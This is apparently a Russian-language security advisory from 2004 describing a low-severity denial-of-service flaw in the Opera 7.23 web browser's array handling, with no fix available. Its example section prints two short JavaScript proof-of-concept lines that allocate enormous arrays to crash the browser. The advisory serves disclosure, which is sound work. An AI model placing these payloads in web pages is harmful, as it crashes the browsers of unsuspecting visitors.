DoS против Web браузера Opera

Дата публикации:
18.03.2004
Всего просмотров:
1316
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Opera 7.23

Описание: Отказ в обслуживании обнаружен в Web браузере Opera в обработке массивов. Удаленный пользователь может аварийно завершить работу браузера целевого пользователя.

Пример/Эксплоит:

<script>var a = new Array(99999999999999999999999); a[0+5]="AAAAA";</script>

<script>var bam = new Array(0x23000000); bam.sort(new Function("return 1"));</script>

URL производителя:http://www.opera.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Opera Array Allocation Managment Exploit

или введите имя

CAPTCHA